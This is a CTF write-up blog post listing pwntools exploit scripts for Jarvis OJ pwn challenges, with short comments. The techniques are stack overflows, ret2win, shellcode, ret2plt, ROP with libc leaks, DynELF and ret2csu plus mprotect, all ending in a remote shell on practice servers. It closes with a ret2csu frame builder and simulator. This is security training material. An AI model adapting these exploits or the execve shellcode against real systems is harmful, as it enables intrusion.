I recently worked through part of Jarvis OJ's pwn challenges and learned a lot. Here I briefly record the exploit scripts; the analysis and reasoning behind each will be added later.


Tell Me Something

This one is similar to level0; see the level0 writeup:
http://www.cnblogs.com/WangAoBo/p/7591552.html

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

elf = ELF('./guestbook')
good_game_addr = elf.symbols['good_game']   # prints the flag; no arguments needed

# io = process('./guestbook')
io = remote('pwn.jarvisoj.com', 9876)

# 0x88 bytes of filler reach the saved return address, which is pointed at good_game
payload = b'A' * 0x88 + p64(good_game_addr)
io.recvuntil(b'message:\n')
io.send(payload)
print(io.recvall())
io.close()

Smashes

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
flag_addr = 0x400d21   # address where the binary has already loaded the flag

# A plain return-address overwrite is caught by the stack canary:
# offset = 0x7fffffffcd68 - 0x7fffffffcb50
# payload = b'A' * offset + p64(flag_addr)
# Instead flood the stack so the argv[0] pointer also becomes flag_addr; the
# stack-protector abort message then prints whatever argv[0] points to, i.e. the flag
payload = p64(flag_addr) * 200

io = remote('pwn.jarvisoj.com', 9877)
# io = process('./smashes')
io.recvuntil(b'name? ')
io.sendline(payload)
# io.recvuntil(b'flag: ')
print(io.recv())
io.sendline()
print(io.recvall())
io.close()

Test Your Memory

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
elf = ELF('./memory')
win_func_addr = elf.symbols['win_func']        # win_func(cmd): called with "cat flag" it prints the flag
cat_flag_addr = next(elf.search(b'cat flag'))  # the "cat flag" string is already in the binary

# 0x13-byte buffer + 4 bytes saved ebp, then a 32-bit call frame:
# return into win_func, a fake return address, and the first argument
payload = b'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

# io = process('./memory')
io = remote('pwn2.jarvisoj.com', 9876)
io.recvuntil(b'> ')
io.sendline(payload)
print(io.recvall())
io.close()

[XMAN]level0

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']   # callsystem() spawns a shell

# io = process('./level0')
io = remote('pwn2.jarvisoj.com', 9881)
io.recvuntil(b'World\n')

# 0x80-byte buffer + 8 bytes saved rbp, then the return address
payload = b'A' * (0x80 + 0x8) + p64(callsys_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level1

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
shellcode = asm(shellcraft.i386.linux.sh())

# io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

# The program prints "What's this:0x........?\n"; keep only the hex digits of the buffer address
text = io.recvline()[14:-2]
buf_addr = int(text, 16)

# Shellcode at the start of the buffer, pad up to the saved return address (0x88 + 4),
# then return into the buffer itself (the binary has no NX)
payload = shellcode + b'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level2

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
elf = ELF('./level2')
sys_addr = elf.symbols['system']          # system@plt
sh_addr = next(elf.search(b'/bin/sh'))    # "/bin/sh" string in the binary

# 32-bit ret2plt: return into system with a fake return address and "/bin/sh" as the argument
payload = b'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

# io = process('./level2')
io = remote('pwn2.jarvisoj.com', 9878)
io.recvuntil(b'Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level2_x64

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'
elf = ELF('./level2_x64')
sys_addr = elf.symbols['system']
sh_addr = next(elf.search(b'/bin/sh'))
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]      # address of a "pop rdi; ret" gadget
# print(type(p_rdi_r_addr))

# On x86-64 the first argument travels in rdi, so load it with the gadget before calling system
payload = b'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

# io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)
io.recvuntil(b'Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

local = 0
if local:
    io = process('./level3')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9879)
    libc = ELF('./libc-2.19.so')     # libc shipped with the challenge

elf = ELF('./level3')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = next(libc.search(b'/bin/sh'))

# Stage 1: write(1, read@got, 4) leaks the runtime address of read, then
# return to _start so the program runs (and can be overflowed) a second time
payload = b'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)
io.recvuntil(b'Input:\n')
io.send(payload)
read_addr = u32(io.recv(4))

# Stage 2: libc base = leaked read - read's offset in the given libc; rebase system and "/bin/sh"
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr
payload = b'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.recvuntil(b'Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3_x64

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

local = 0
if local:
    io = process('./level3_x64')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9883)
    libc = ELF('./libc-2.19.so')

elf = ELF('./level3_x64')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = next(libc.search(b'/bin/sh'))
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]          # pop rdi; ret
p_rsi_r15_r_addr = rop.rsi[0]      # pop rsi; pop r15; ret

# Stage 1: write(1, read@got, <whatever rdx holds>) leaks read's address, then return to _start
payload = b'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)                # rdi = stdout
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)      # rsi = read@got
payload += p64(0x0)                # r15 (junk)
payload += p64(write_elf_addr)
payload += p64(start_elf_addr)
io.recvuntil(b'Input:\n')
io.send(payload)
read_addr = u64(io.recv(0x8))

# Stage 2: rebase system and "/bin/sh" with the leaked address, then system("/bin/sh")
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr
payload = b'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(sh_addr)
payload += p64(sys_addr)
payload += p64(0xdeadbeef)
io.recvuntil(b'Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level4

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

# io = process('./level4')
io = remote('pwn2.jarvisoj.com', 9880)
elf = ELF('./level4')
write_elf_addr = elf.symbols['write']
start_elf_addr = elf.symbols['_start']
read_elf_addr = elf.symbols['read']
bss_addr = elf.bss()


def leak(addr):
    # write(1, addr, 4) and restart via _start: an arbitrary 4-byte read primitive for DynELF
    payload = b'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)
    io.send(payload)
    leaked = io.recv(4)
    log.info("leaked -> %r -> 0x%x" % (leaked, u32(leaked)))
    return leaked


# No libc is provided for this challenge, so let DynELF resolve system through the leak primitive
d = DynELF(leak, elf=elf)
sys_addr = d.lookup('system', 'libc')
log.info("sys_addr -> 0x%x" % sys_addr)

# read(0, bss, 8) to place "/bin/sh\0" in .bss, then restart once more
payload = b'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload)
io.send(b'/bin/sh\0')

# system("/bin/sh")
sh_addr = bss_addr
payload = b'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level5

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.terminal = ['deepin-terminal', '-x', 'bash', '-c']
context.log_level = 'debug'


def Debug():
    raw_input("waiting for debug:")
    gdb.attach(io, "b *0x0000000000400618")


elf = ELF('./level5')
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]          # pop rdi; ret
p_rsi_r15_r_addr = rop.rsi[0]      # pop rsi; pop r15; ret
# The two __libc_csu_init gadgets used for ret2csu:
p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
mov_call = 0x0000000000400690                       # mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+rbx*8]

local = 0
if local:
    io = process('./level5')
    libc = ELF('./libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9884)
    libc = ELF('./libc-2.19.so')
io.recvuntil(b'Input:\n')

log.info("Step 1: leak read_addr")
read_libc_addr = libc.symbols['read']
read_got_addr = elf.got['read']
write_elf_addr = elf.symbols['write']
vuln_elf_addr = elf.symbols['vulnerable_function']

# write(1, read@got, ...) and return into vulnerable_function for the next overflow
payload = b'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0000)
payload += p64(write_elf_addr)
payload += p64(vuln_elf_addr)
io.send(payload)
read_addr = u64(io.recv(8))
io.recvuntil(b'Input:\n')
log.info("leaked read_addr -> 0x%x" % read_addr)

log.info("Step 2: write shellcode 2 bss")
sh_addr = bss_addr = elf.bss()
# execve("/bin/sh", 0, 0): pushes "/bin/sh\0", rdi = rsp, rdx = 0, rax = 0x3b (assumes the
# upper bytes of rax are already zero); rsi is whatever r14 was when the csu gadget calls it (0 in Step 6)
shellcode = b"\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"
# ret2csu frame: rbx=0, rbp=1, r12=read@got, r13->rdx, r14->rsi, r15->edi  =>  read(0, bss, len+1)
payload = b'B' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)                  # rbx
payload += p64(0x1)                  # rbp (must be rbx+1 so the csu loop exits after one call)
payload += p64(read_got_addr)        # r12: call [r12 + rbx*8] = read
payload += p64(len(shellcode) + 1)   # r13 -> rdx (count)
payload += p64(bss_addr)             # r14 -> rsi (buf)
payload += p64(0x0)                  # r15 -> edi (fd 0)
payload += p64(mov_call)
payload += b'C' * (7 * 8)            # add rsp, 8 plus the six pops after the call
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(shellcode + b'\0')
io.recvuntil(b'Input:\n')

log.info("Step 3: hijack mprotect 2 __gmon_start__")
mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']
mprotect_hijack_addr = 0x0000000000600a70   # writable slot that will hold the mprotect pointer
# read(0, mprotect_hijack_addr, 8)
payload = b'D' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(mprotect_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += b'E' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(mprotect_addr))
io.recvuntil(b'Input:\n')

log.info("Step 4: hijack sh/bss 2 __libc_start_main")
sh_hijack_addr = 0x0000000000600a68   # writable slot that will hold the shellcode (bss) pointer
# read(0, sh_hijack_addr, 8)
payload = b'F' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += b'G' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(sh_addr))
io.recvuntil(b'Input:\n')

log.info("Step 5: fix bss 2 777")
# call [mprotect_hijack_addr] = mprotect(0x600000, 0x1000, 7): make the page holding .bss executable
payload = b'H' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(mprotect_hijack_addr)
payload += p64(0x7)                  # r13 -> rdx (prot = rwx)
# payload += p64(len(shellcode) + 1)
# payload += p64(sh_hijack_addr)
payload += p64(0x1000)               # r14 -> rsi (len)
payload += p64(0x00600000)           # r15 -> edi (page-aligned addr)
payload += p64(mov_call)
payload += b'I' * (7 * 8)
payload += p64(vuln_elf_addr)
# Debug()
io.send(payload)
io.recvuntil(b'Input:\n')

log.info("Step 6: execve shellcode")
# call [sh_hijack_addr] = the shellcode in .bss, with rdx = rsi = 0 and edi = 0
payload = b'J' * (0x80 + 0x8)
# payload += p64(sh_addr)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(mov_call)
payload += p64(vuln_elf_addr)
io.send(payload)

log.info("Step 7: getshell")
io.interactive()
io.close()
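Steps 2 to 6 of the level5 exploit are all the same ret2csu frame with different values popped into rbx, rbp, r12, r13, r14 and r15; it is easy to get the order wrong when writing such a frame by hand. The helper below is an added example, not part of the original writeup: it builds one frame from the two `__libc_csu_init` gadget addresses the script uses for ./level5 (0x4006aa and 0x400690) and includes a tiny interpreter of those two gadgets, so the call that a frame will perform can be checked offline before anything is sent. The function-pointer slot, memory contents and return address in the demo are made-up values, not taken from the binary.

```python
import struct


def p64(x):
    return struct.pack('<Q', x & 0xffffffffffffffff)


def u64(b):
    return struct.unpack('<Q', b)[0]


# Gadget addresses as used in the level5 exploit above (tail of __libc_csu_init).
CSU_POP6_RET = 0x4006aa   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_MOV_CALL = 0x400690   # mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12 + rbx*8]
                          # ... add rbx, 1; cmp rbp, rbx; jne; add rsp, 8; pop rbx..r15; ret


def csu_call(fptr_slot, rdi, rsi, rdx, ret_to,
             pop6=CSU_POP6_RET, mov_call=CSU_MOV_CALL):
    """Return the stack frame for one ret2csu call:
    (*fptr_slot)(rdi, rsi, rdx), after which execution continues at ret_to."""
    return b''.join([
        p64(pop6),
        p64(0),              # rbx = 0  -> call [r12 + 0*8]
        p64(1),              # rbp = 1  -> after `add rbx, 1; cmp rbp, rbx` the loop falls through
        p64(fptr_slot),      # r12 = address of a slot that holds the function pointer (GOT, .bss)
        p64(rdx),            # r13 -> rdx (third argument)
        p64(rsi),            # r14 -> rsi (second argument)
        p64(rdi),            # r15 -> edi (first argument: only the low 32 bits reach the callee)
        p64(mov_call),
        b'\0' * (7 * 8),     # consumed by `add rsp, 8` and the six pops that follow the call
        p64(ret_to),         # final ret
    ])


def simulate_csu(frame, memory):
    """Walk one frame through the two gadgets and return
    (callee, rdi, rsi, rdx, next_rip).  `memory` maps slot addresses to the 8-byte
    values stored there, standing in for what `call [r12 + rbx*8]` dereferences."""
    words = [u64(frame[i:i + 8]) for i in range(0, len(frame), 8)]
    if len(words) != 16 or words[0] != CSU_POP6_RET or words[7] != CSU_MOV_CALL:
        raise ValueError("not a frame built for these two gadgets")
    rbx, rbp, r12, r13, r14, r15 = words[1:7]
    rdx, rsi, edi = r13, r14, r15 & 0xffffffff      # mov edi, r15d truncates
    callee = memory[r12 + rbx * 8]
    if rbx + 1 != rbp:
        raise ValueError("rbp must be rbx+1, otherwise the csu loop re-runs the call")
    # add rsp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
    next_rip = words[8 + 7]
    return callee, edi, rsi, rdx, next_rip


if __name__ == '__main__':
    # Demo with made-up addresses: the equivalent of Step 2, read(0, bss, 31), returning to vulnerable_function.
    read_got, bss, vuln = 0x601028, 0x601060, 0x4005e6
    frame = csu_call(read_got, rdi=0, rsi=bss, rdx=31, ret_to=vuln)
    fake_memory = {read_got: 0x7ffff7b04250}   # pretend this is read's resolved address
    print(simulate_csu(frame, fake_memory))
```

Two things the simulator makes visible that the raw p64 lists hide: rbp has to be exactly rbx+1, or the `cmp rbp, rbx; jne` loop calls the function again with the same registers; and the first argument passes through `mov edi, r15d`, so a full 64-bit pointer (a stack address, for instance) cannot be delivered this way, which is why the level5 script only ever puts small values or low addresses such as 0x600000 in that slot.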
